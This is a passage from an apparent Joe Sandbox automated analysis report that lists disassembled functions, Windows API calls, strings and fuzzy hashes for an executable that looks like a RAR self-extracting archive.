        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _swprintf
        • String ID: %ls$%s: %s
        • API String ID: 589789837-2259941744
        • Opcode ID: 90e6f6412fde160b584a72fe5a21e48d10f672423844e1171ddb5a8f8c89bd8b
        • Instruction ID: c699a986b090430ad6b1dcaaca3b271cad6becfc969bc5d78b042db54161f871
        • Opcode Fuzzy Hash: 90e6f6412fde160b584a72fe5a21e48d10f672423844e1171ddb5a8f8c89bd8b
        • Instruction Fuzzy Hash: D9511635288315FFFE293A84DC02F36B669AB24B09F214506F38A754E9C7B25451AB1B
        Function 00149320 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
        Download Yara Rule
        APIs
        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\HSZXPMB7kS.exe,00000104), ref: 00149360
        • _free.LIBCMT ref: 0014942B
        • _free.LIBCMT ref: 00149435
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _free$FileModuleName
        • String ID: C:\Users\user\Desktop\HSZXPMB7kS.exe
        • API String ID: 2506810119-1930514608
        • Opcode ID: 770274253c8c14a5369ae9d61e5d60a17adbd2b88007cefcbdd8c4de57cc6207
        • Instruction ID: e844c90a0aaa3f726056f2c0e3d4f40c25a161b51504c21c956ee83063f0f96d
        • Opcode Fuzzy Hash: 770274253c8c14a5369ae9d61e5d60a17adbd2b88007cefcbdd8c4de57cc6207
        • Instruction Fuzzy Hash: 15318F71A00218EFDB21DFA9DD8599FBBF8EB96310F1540A6F50497261D7708A818B91
        Function 00144356 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0014437B
        • _abort.LIBCMT ref: 00144486
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: EncodePointer_abort
        • String ID: MOC$RCC
        • API String ID: 948111806-2084237596
        • Opcode ID: ea958b73aff1a6471cf894e56cc4d130a8e7ce3ef90f252de51090ed7716d8d5
        • Instruction ID: 39b4b0c17175027d183721e429e76e7ba7332ca13a63205f47995859299de0e3
        • Opcode Fuzzy Hash: ea958b73aff1a6471cf894e56cc4d130a8e7ce3ef90f252de51090ed7716d8d5
        • Instruction Fuzzy Hash: 22414772900209EFDF15DF98CC81BAEBBB5BF48304F188159F918A7261D335AA50DB51
        Function 00127F1B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92COMMON
        Download Yara Rule
        APIs
        • __EH_prolog.LIBCMT ref: 00127F20
          • Part of subcall function 001242F1: __EH_prolog.LIBCMT ref: 001242F6
        • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00127FE5
          • Part of subcall function 00128704: GetCurrentProcess.KERNEL32(00000020,?), ref: 00128713
          • Part of subcall function 00128704: GetLastError.KERNEL32 ref: 00128759
          • Part of subcall function 00128704: CloseHandle.KERNEL32(?), ref: 00128768
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
        • String ID: SeRestorePrivilege$SeSecurityPrivilege
        • API String ID: 3813983858-639343689
        • Opcode ID: 48b06dc937cd65f326c7dba6af77fb21d6280d65364ad57ee4d2178c7ba9a363
        • Instruction ID: b5a5283ec5643879e5baec9fd9a34ed5a6da51324d088cc800146140cdce7f64
        • Opcode Fuzzy Hash: 48b06dc937cd65f326c7dba6af77fb21d6280d65364ad57ee4d2178c7ba9a363
        • Instruction Fuzzy Hash: A1310371904264BFDF20EB64BD01BEF7BA9EB14314F004025F814EB191CBB48E99DB60
        Function 0013BDD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 001212F6: GetParent.USER32(?), ref: 0012132A
          • Part of subcall function 001212F6: GetDlgItem.USER32(00000000,00003021), ref: 0012133A
          • Part of subcall function 001212F6: SetWindowTextW.USER32(00000000,001545F4), ref: 00121350
        • EndDialog.USER32(?,00000001), ref: 0013BE58
        • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0013BE6D
        • SetDlgItemTextW.USER32(?,00000066,?), ref: 0013BE82
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ItemText$DialogParentWindow
        • String ID: ASKNEXTVOL
        • API String ID: 364370097-3402441367
        • Opcode ID: 2ad163ff34bae87ce64962703bc35a71318551dd2be0b4e625258ed71cbadb0b
        • Instruction ID: c26966aa6bd2138bfcb6fe52381824dcc4dc99210663aa77766a5b72ec124fde
        • Opcode Fuzzy Hash: 2ad163ff34bae87ce64962703bc35a71318551dd2be0b4e625258ed71cbadb0b
        • Instruction Fuzzy Hash: 2F110832208120BFD7119F6CEC8AFB73BA9EB5AF00F040025F750EB0B4D7629A5197A5
        Function 0012EC0C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
        Download Yara Rule
        APIs
        • __fprintf_l.LIBCMT ref: 0012EC74
        • _strncpy.LIBCMT ref: 0012ECBA
          • Part of subcall function 001330E5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00163070,00000200,0012EC48,00000000,?,00000050,00163070), ref: 00133102
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ByteCharMultiWide__fprintf_l_strncpy
        • String ID: $%s$@%s
        • API String ID: 562999700-834177443
        • Opcode ID: 2c9b954a949b85cf2c71ceb4d48fe534527bafa51152f245695afea82992abac
        • Instruction ID: af66c7f7c64c821ca18e780a10a751202277190155bd28a11f9f3d94ac3cadb7
        • Opcode Fuzzy Hash: 2c9b954a949b85cf2c71ceb4d48fe534527bafa51152f245695afea82992abac
        • Instruction Fuzzy Hash: 7E219D72540218AFEB21EEE4ED42FEF3BE8AF14704F040526F9259A1A1E371D6788B51
        Function 0013215F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
        Download Yara Rule
        APIs
        • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0012C04A,00000008,?,00000000,?,0012E685,?,00000000), ref: 0013219E
        • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0012C04A,00000008,?,00000000,?,0012E685,?,00000000), ref: 001321A8
        • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0012C04A,00000008,?,00000000,?,0012E685,?,00000000), ref: 001321B8
        Strings
        • Thread pool initialization failed., xrefs: 001321D0
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Create$CriticalEventInitializeSectionSemaphore
        • String ID: Thread pool initialization failed.
        • API String ID: 3340455307-2182114853
        • Opcode ID: d20e3c9b6e32ebf36cbd489dc278cdc6288a77f58a2b0ac584afeb0168d72938
        • Instruction ID: 1a727b633385a7330e335916124ffb0b94ce4837193a772bb265b3c609a264d4
        • Opcode Fuzzy Hash: d20e3c9b6e32ebf36cbd489dc278cdc6288a77f58a2b0ac584afeb0168d72938
        • Instruction Fuzzy Hash: 2E11E7B1604704AFC3215F799C849A7FBECFB54344F14082EF2DAC7240D77059808B60
        Function 0013C450 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 001212F6: GetParent.USER32(?), ref: 0012132A
          • Part of subcall function 001212F6: GetDlgItem.USER32(00000000,00003021), ref: 0012133A
          • Part of subcall function 001212F6: SetWindowTextW.USER32(00000000,001545F4), ref: 00121350
        • EndDialog.USER32(?,00000001), ref: 0013C49E
        • GetDlgItemTextW.USER32(?,00000066,?,00000200), ref: 0013C4B6
        • SetDlgItemTextW.USER32(?,00000067,?), ref: 0013C4E4
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ItemText$DialogParentWindow
        • String ID: GETPASSWORD1
        • API String ID: 364370097-3292211884
        • Opcode ID: 50cadfd436b3e0824d4b7b5e088c505fb44afb3cab7f180f79618d0fcdab7da8
        • Instruction ID: 53f8c125e6fb750e24c3fc2863db5a3301fdc507e3ec03da077c88a622b11517
        • Opcode Fuzzy Hash: 50cadfd436b3e0824d4b7b5e088c505fb44afb3cab7f180f79618d0fcdab7da8
        • Instruction Fuzzy Hash: 2411C472A00128B6DB219E749D6DFFB3B6DEB09714F010010FB09F6480C3709A419BE0
        Function 0013EE1D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID:
        • String ID: RENAMEDLG$REPLACEFILEDLG
        • API String ID: 0-56093855
        • Opcode ID: 07753a0fd3bb70840833f5ce7db1fcf34cde55b2cb3feceb48432f5a8be50cff
        • Instruction ID: 8e5e262ee2ea23878ba186686b06abeb7a37faee123d0fdc3718f6bd8e20a2a3
        • Opcode Fuzzy Hash: 07753a0fd3bb70840833f5ce7db1fcf34cde55b2cb3feceb48432f5a8be50cff
        • Instruction Fuzzy Hash: 4B019E72604308EFDB114F29EC48A673BE5EB09394F540035F805A36B0C7B19D94DFA1
        Function 001212F6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 0012F608: _swprintf.LIBCMT ref: 0012F62E
          • Part of subcall function 0012F608: _strlen.LIBCMT ref: 0012F64F
          • Part of subcall function 0012F608: SetDlgItemTextW.USER32(?,00160274,?), ref: 0012F6AF
          • Part of subcall function 0012F608: GetWindowRect.USER32(?,?), ref: 0012F6E9
          • Part of subcall function 0012F608: GetClientRect.USER32(?,?), ref: 0012F6F5
        • GetParent.USER32(?), ref: 0012132A
        • GetDlgItem.USER32(00000000,00003021), ref: 0012133A
        • SetWindowTextW.USER32(00000000,001545F4), ref: 00121350
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ItemRectTextWindow$ClientParent_strlen_swprintf
        • String ID: 0
        • API String ID: 1283792255-4108050209
        • Opcode ID: 27f85a57fd9fd5d2db50aaa730de09753c337b623d9ca1c9dc183f8306f97ca9
        • Instruction ID: 8e6d8dca855115ead7ebcca82e5c90b42f00adbd11e8cbdf2c2025b614649bd5
        • Opcode Fuzzy Hash: 27f85a57fd9fd5d2db50aaa730de09753c337b623d9ca1c9dc183f8306f97ca9
        • Instruction Fuzzy Hash: 0DF0A431104698BBDF16CF60AC0DBE93BAABB24354F044538FD44548A1D775C5B4EB14
        Function 00124957 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON
        Download Yara Rule
        APIs
        • std::_Xinvalid_argument.LIBCPMT ref: 0012495C
          • Part of subcall function 0013FD0D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0013FD19
          • Part of subcall function 0013FD0D: ___delayLoadHelper2@8.DELAYIMP ref: 0013FD3F
        • std::_Xinvalid_argument.LIBCPMT ref: 00124967
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Xinvalid_argumentstd::_$Helper2@8Load___delaystd::invalid_argument::invalid_argument
        • String ID: string too long$vector too long
        • API String ID: 2355824318-1617939282
        • Opcode ID: ac084db7de78c04aa4b01697ab4c3edee380914d9900a3770afea91fd03c4f59
        • Instruction ID: 35a99088e48847c901a6fddaf159d48aa8e9970579d72cbda1a443ac76b8cc4d
        • Opcode Fuzzy Hash: ac084db7de78c04aa4b01697ab4c3edee380914d9900a3770afea91fd03c4f59
        • Instruction Fuzzy Hash: E0F02031200324AB8A24AF99FC4584BB3EDEF99B58750092AF940C3602D7B0E9948BB1
        Function 0013AC14 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33registryCOMMON
        Download Yara Rule
        APIs
        • LoadCursorW.USER32(00000000,00007F00), ref: 0013AC4B
        • RegisterClassExW.USER32(00000030), ref: 0013AC6C
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ClassCursorLoadRegister
        • String ID: 0$RarHtmlClassName
        • API String ID: 1693014935-3342523147
        • Opcode ID: 3f40666d3c0bafe1f257dde87f0a4f5f9ff95341988117518af5463f0fa5225a
        • Instruction ID: 905d893d3f925b90d8c89edafb065f8fd3443051055d7e692e607fe9e4124593
        • Opcode Fuzzy Hash: 3f40666d3c0bafe1f257dde87f0a4f5f9ff95341988117518af5463f0fa5225a
        • Instruction Fuzzy Hash: ABF0CFB1D11219ABDB009FD9DA88ADEFFB8FB08755F50402AE515B7240D7B85A048FE4
        Function 0014ABCA Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
        Download Yara Rule
        APIs
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: __alldvrm$_strrchr
        • String ID:
        • API String ID: 1036877536-0
        • Opcode ID: 838d351d10c979b051735ecdd2ea4a95940ff434e8fe6276b15dd9b2de709c18
        • Instruction ID: c2c12ccc08f9c00c208a318bed4a7d9ad57599d06f636560af438bcfd3681b3d
        • Opcode Fuzzy Hash: 838d351d10c979b051735ecdd2ea4a95940ff434e8fe6276b15dd9b2de709c18
        • Instruction Fuzzy Hash: 5FA1BB72D803869FDB26CF58C8917BEBBE0EF25310F56016DE5959B2A2C3388D41C752
        Function 0012B74D Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
        Download Yara Rule
        APIs
        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00128D5C,?,?,?), ref: 0012B7F3
        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000800,?,00128D5C,?,?), ref: 0012B837
        • SetFileTime.KERNEL32(?,00128AEC,?,00000000,?,00000800,?,00128D5C,?,?,?,?,?,?,?,?), ref: 0012B8B8
        • CloseHandle.KERNEL32(?,?,00000800,?,00128D5C,?,?,?,?,?,?,?,?,?,?), ref: 0012B8BF
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: File$Create$CloseHandleTime
        • String ID:
        • API String ID: 2287278272-0
        • Opcode ID: eb8a5b5184701a9938e188d2055aab7f9cf1b5a5406353966d554fadae36ad81
        • Instruction ID: 2b7b82ff5673b7a9a4b41154559a4a599da7d10d71b36bf7c75772ba6123b738
        • Opcode Fuzzy Hash: eb8a5b5184701a9938e188d2055aab7f9cf1b5a5406353966d554fadae36ad81
        • Instruction Fuzzy Hash: E841FD3124C391AAE720EF24EC81BEABBE8AF90300F14091DF6D5971C0D774EA58DB52
        Function 001210E0 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
        Download Yara Rule
        APIs
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _wcslen
        • String ID:
        • API String ID: 176396367-0
        • Opcode ID: dbafbaf424326a6bb4e2225e89dc087c8b9946ce8700a03ad5c303c583eafaa3
        • Instruction ID: e3c235d0b08a3cb0d245f7a8023983f3c746db7563d720e79b9a79d370015746
        • Opcode Fuzzy Hash: dbafbaf424326a6bb4e2225e89dc087c8b9946ce8700a03ad5c303c583eafaa3
        • Instruction Fuzzy Hash: A641B271900629ABCB15DF789C09AEE7BB8EF24311F100029FD05F7255DB30AE998BE0
        Function 0012851F Relevance: 6.1, APIs: 4, Instructions: 118COMMON
        Download Yara Rule
        APIs
        • _wcslen.LIBCMT ref: 00128532
        • _wcslen.LIBCMT ref: 00128558
        • _wcslen.LIBCMT ref: 001285EF
        • _wcslen.LIBCMT ref: 00128657
          • Part of subcall function 0012B966: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 0012B991
          • Part of subcall function 0012B41F: RemoveDirectoryW.KERNEL32(?,?,?,00128649,?), ref: 0012B430
          • Part of subcall function 0012B41F: RemoveDirectoryW.KERNEL32(?,?,?,00000800,?,00128649,?), ref: 0012B45E
        Memory Dump Source
